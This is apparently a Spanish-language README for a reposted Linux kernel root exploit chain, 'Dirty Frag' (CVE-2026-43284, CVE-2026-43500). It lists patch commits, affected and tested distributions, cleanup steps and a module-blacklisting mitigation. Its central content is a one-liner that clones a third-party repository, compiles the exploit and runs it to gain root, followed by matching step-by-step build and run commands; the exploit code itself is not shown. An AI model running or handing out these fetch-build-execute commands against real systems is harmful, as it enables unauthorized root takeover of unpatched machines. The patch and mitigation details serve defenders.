
Cadena de explotación del kernel de Linux (CVE-2026-43284 y CVE-2026-43500) que logra root mediante vulnerabilidades de escritura en la caché de páginas de xfrm-ESP y RxRPC.
Linux CVE-2026-43284 & CVE-2026-43500
Copiado de @V4bel :) Gracias :)
Este documento describe la clase de vulnerabilidad Dirty Frag, descubierta y reportada por primera vez por Hyunwoo Kim (@v4bel), que puede obtener privilegios de root en las principales distribuciones de Linux encadenando la vulnerabilidad xfrm-ESP Page-Cache Write (CVE-2026-43284) y la vulnerabilidad RxRPC Page-Cache Write (CVE-2026-43500).
Dirty Frag es un caso que extiende la clase de errores a la que pertenecen Dirty Pipe y Copy Fail. Debido a que es un error de lógica determinista que no depende de una ventana de tiempo, no se requiere una condición de carrera, el kernel no entra en pánico cuando el exploit falla, y la tasa de éxito es muy alta.
Para obtener información técnica detallada y la cronología, consulte aquí.
xfrm-ESP Page-Cache Write (CVE-2026-43284) fue parcheada en mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) fue parcheada en mainline aa54b1d27fe0.
Explotación : ¡Solo ejecutar en entornos autorizados !!
Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Paso a Paso :
primero compile el exploit, luego ejecute el binario
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Limpieza
⚠️ Importante: Después de ejecutar este exploit, la caché de páginas queda contaminada. Para limpiar la caché de páginas contaminada y garantizar la estabilidad del sistema, ejecute:
echo 3 > /proc/sys/vm/drop_caches
o reinicie el sistema. Versiones Afectadas
CVE-2026-43284: la vulnerabilidad xfrm-ESP Page-Cache Write está en alcance desde cac2661c53f3 (2017-01-17) hasta f4c50a4034e6 (2026-05-05).
CVE-2026-43500: la vulnerabilidad RxRPC Page-Cache Write está en alcance desde 2dc334f1a63a (2023-06-08) hasta aa54b1d27fe0 (2026-05-10).
En otras palabras, el tiempo de vida efectivo de las vulnerabilidades es de aproximadamente 9 años.
Este Dirty Frag ha sido probado en las siguientes versiones de distribución.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
Mitigación
Utilice el siguiente comando para eliminar los módulos en los que ocurren las vulnerabilidades y limpiar la caché de páginas.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Una vez que cada distribución aplique el parche correspondiente, actualice en consecuencia.